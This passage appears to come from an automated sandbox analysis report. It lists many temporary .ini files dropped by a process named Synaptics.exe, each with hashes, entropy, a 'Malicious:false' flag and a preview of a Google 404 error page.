                                                                                                                                                                                        SHA-512:297ED81E0699169B03186F4A0BC45AB0D7F865EC2CBC969A4A0D8C300C2D4E9A68A05CC048ACE353FA882132EAF9A1BE80D4A06F3F28F99114806B0A81BA4ABD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gCHpO/NYeYOAXAlQ4grTFw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UjaokOs.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.252062983757401
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
                                                                                                                                                                                        MD5:18067A907E13043EAB163A2154AF1061
                                                                                                                                                                                        SHA1:D95BEF38DD246FEE43D8DCAF920A5D689AC94817
                                                                                                                                                                                        SHA-256:24DF8FCCB4763898EEF10E884EED4544A6CA0BFDF1F0F48B2950935B8DAA14FC
                                                                                                                                                                                        SHA-512:2F3BBB6F819885C75F26E5DDCE89EB37F926BBF338015F5B72D06EDF116EF31D4417441ED9809171C1D7C0B32FCA404460CC2E235F580D4DD5681A0955190680
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Cv38aIr2Diouy5WEsFdeLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UvZ1lWu.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268629122824428
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0zcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+z+pAZewRDK4mW
                                                                                                                                                                                        MD5:E6169F7979D1557AE5D973F39ADD2888
                                                                                                                                                                                        SHA1:26D72C10D889DF7AAC48BC3B60BCD9EB61FA9CD9
                                                                                                                                                                                        SHA-256:B316B300938F0EC65BFF706449331E4ADA403AAFA72776E0112BADE369FE2CDA
                                                                                                                                                                                        SHA-512:88FE99B945762A960FFDBAD003FB9765E4138B3DC32DD2C93556C625BF6CFA77EE91679BBC2CD78B056F417C0123453B6A7503835E5DDFF5637BDEBF04973117
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4+X3j7XnJ6JoR9iFNg0mBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\V7D6gQ7.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260457634648714
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0GuSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Xu+pAZewRDK4mW
                                                                                                                                                                                        MD5:BD5931893D8C32103A3AB001A6947187
                                                                                                                                                                                        SHA1:102AC762AFF70B55DC232DCBC5AE73D5EF01704F
                                                                                                                                                                                        SHA-256:8FAE830C605AEEE75F09FF12C5B42D7DBDED1232433D460AA5E40CB9007E165A
                                                                                                                                                                                        SHA-512:8AA980BBF75C15B7335E286785678005466B4BCF6C81DFBB54622DED311FAAC48AC5EABF6F607C391BC03CAD3B12443B43165DFC1C2DB5E07943F7B869C51C90
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t38aRNMeJ8haZ+3H2vh79g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\VqswZer.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263685914361226
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0X1DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+G+pAZewRDK4mW
                                                                                                                                                                                        MD5:DAC759F6E2EDE6561F474B0DF4AFDFBF
                                                                                                                                                                                        SHA1:E2E6609D5BB4A29E4B6A4120BCC5A4B6BBCD1F07
                                                                                                                                                                                        SHA-256:062DFBF1481415B7FFD8ADD3E7C2DF79B4BA5572084CDCF92ECAB3029932ADE9
                                                                                                                                                                                        SHA-512:B53D18478DB1BA5CEA3E13BA27D74852CB759E89D03240B56C6077475EE85E5BA4B7A011C31201A61397B1DEA686CEDAB2A550F7DDEA63040213F6BA433BF050
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bmdY3NC6ZCoevAO7bfBalQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WIg18y8.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259232312068911
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                        MD5:4D59555F83D597EF0D9BB7ACCA600349
                                                                                                                                                                                        SHA1:7EC52DCEF262D1A87B7C1250C0C313E310D4532A
                                                                                                                                                                                        SHA-256:47C6FA3AD711F99B9ACEE90F8E632907E8CD688469A3A6884A12879448F7E1A7
                                                                                                                                                                                        SHA-512:2B3E2366FE818858A3AAE095EB51D413240E878EADC0B3225D59FC1DF788A7EA2F9AAE6BA9AE1B0460261703EA9F946A565911FB72C3B7B7C93B70BB6831E6AB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lLrYEh+eSLUUyiIu5KenyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WLf94Bl.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.256775349038716
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0pmISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+pI+pAZewRDK4mW
                                                                                                                                                                                        MD5:EA2D3F98822848B68AB8A1A0EFFCF658
                                                                                                                                                                                        SHA1:3DADBFD48D78E32807F14490F3778C9573DC30A3
                                                                                                                                                                                        SHA-256:357BF21D9CB3D60435068252FFDF2BFF11C6A741B71BAE2042552BAD9F812EB4
                                                                                                                                                                                        SHA-512:572BDD15EF65FF846F88982CFBD01A2F34429FCFAB4CEFDE7FB5FF9F2ADE725260C9DD8512DA42229594D99271D5F7C240E5DD877714E995BB5FEE7B50315DC0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LgGaN57/RriBJE3uHQwqnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\We3Axg1.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2627324099179775
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0GSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+t+pAZewRDK4mW
                                                                                                                                                                                        MD5:D1CF0DA5BF1B8969569CCD3BD3B3E8A0
                                                                                                                                                                                        SHA1:9FB474982DBB18E3EA22052E1E968AE43FA21870
                                                                                                                                                                                        SHA-256:66160F61E9B3A5FDEA09208169534C6386DDAA17ED67B82C231119CD7A4A43B6
                                                                                                                                                                                        SHA-512:9C0E90034509395D08CF423463805010983E07962A04AEBA55CFC0085710C2DB50BBDF8CD0B5714B7C0F65102DEF7EDEFEF3780F8B87721A17B3CB02EA307640
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xN8a+TKvKMHiOnEdgZkWug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\WeUcVbS.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.27369101893852
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+4+pAZewRDK4mW
                                                                                                                                                                                        MD5:6F387E6AEBE4892E790E59C51109D4FA
                                                                                                                                                                                        SHA1:B46ECBDC0424879A29818EF118EBA467D0D3CE32
                                                                                                                                                                                        SHA-256:32D2BA7B39C892EF160C436976CA01DBA39A1465A4F01EC70F9753ECAA66C8C3
                                                                                                                                                                                        SHA-512:579CA3D6075480613A029395346124E922A01E85CCEB2D29DC34C5C2F38203F66499EF018745EBB251584F35F755B8EA201DE1101938B5F465F5E818CE9D70D6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GLFVGgZkEQJq4SWhSFdK0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\XZ6vTyD.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262643793177348
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+06gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+g+pAZewRDK4mW
                                                                                                                                                                                        MD5:9BE5A6A180AC36017A5C830C742F10B6
                                                                                                                                                                                        SHA1:F0B3FC7E2E3FBC43427208A5362A43BC027EE0AB
                                                                                                                                                                                        SHA-256:13892DB54031D62544C4479AEB84DFB767425EFBBC4C46B41ECA0CCBC5499830
                                                                                                                                                                                        SHA-512:D0325B9BFA8CBF99F8EA22610AED70A20FFD2BD838D46B2CA757D88F30FB9D900A26C75CF3D9448F1FFC0E03786F254768948900A84EEA88F12609CDBCB53941
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U72cR5OIxiUSk1HE5zvuuQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\XaffvfI.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2643551633528185
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9+pAZewRDK4mW
                                                                                                                                                                                        MD5:1BBB5FFCC372559D5A86DAEC672A7510
                                                                                                                                                                                        SHA1:D83E334E5808DEED0F344CA2FFAD287B775FFC65
                                                                                                                                                                                        SHA-256:448B5EAF5943D3A905EB444E09B97A6870BEAD982556B185808840C0CD8E0730
                                                                                                                                                                                        SHA-512:8E616AEBC979360F1286A31084CECAAD586275B748B7DBAFFC7859BB09C202FCBA188F81CE73A5D9C94C45978B937F047A692EE114B5BA9135A1344AA4C3D37A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pnXRDa+GgLdRb+0qTW9VrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Xc9cSQa.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25732512327912
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                        MD5:7A5E59232A0AE6B4EA521ACD5F718C48
                                                                                                                                                                                        SHA1:EAC01D52D850AEC0939AA01B2AAB0530A6FD4382
                                                                                                                                                                                        SHA-256:76890359DABD46582008E5C840485C081EC9B5DD78A569307CCF6A7C2A329B06
                                                                                                                                                                                        SHA-512:02EB303CED3A74B1ACB92B053104175B9ED1D9A01960C19BE6CE79E149299F3101B0725F5270743B7074525C44701DF8CFF194D81B7051FCCA670A049A1E2B74
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="d9dddi1nWvC0kLF769LELQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Xw7R7Ql.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.274819769791805
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0yWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+FW+pAZewRDK4mW
                                                                                                                                                                                        MD5:FCFCED7E44BA34D89B3FEB0FE89CAEA9
                                                                                                                                                                                        SHA1:C5C3FF3A43037A0424F7AAC2E0264DC3D7867939
                                                                                                                                                                                        SHA-256:8AEF10D79DC93EB72F042BE91209B4959714862159BA5DB7F15DBBE73ABC6A86
                                                                                                                                                                                        SHA-512:81495FDB2C3F8FDFB224553EDDF7D193A7C2A77AB49A4471E87ED3143B4FE38283577AE1E08F69CE8C0B1407D05F2740DCA93773F7705386EE0B88A5540B4294
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J3MaTzOB2nV1rvEAHIHQhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\XzVSgkt.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260083762279467
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                        MD5:0980C8369A1C28B0999C6FA17F615F30
                                                                                                                                                                                        SHA1:7197D76148A5EF7641238F6332D02FD70226CC27
                                                                                                                                                                                        SHA-256:BA3B526EC7C12F2C5890C0DAF9CB51A33F48BFC49C4A2130ED650BC854AF5800
                                                                                                                                                                                        SHA-512:B93237527FD8416865E8539A076F9C4777F58A1DC8E1618C01725C4823CFCB6222720438350E815171C76AC7E1722F453FC5BFDB90D2CD259B3CC94AD04B8548
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xYkot3pre0RCQzYvSwI5GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Y9fB9nI.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260810762351824
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0H3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+o+pAZewRDK4mW
                                                                                                                                                                                        MD5:A2A7CF7FD8C804D312E5123599A1A327
                                                                                                                                                                                        SHA1:D76272CEE1035C7E86B975A5CA139371BAACC47A
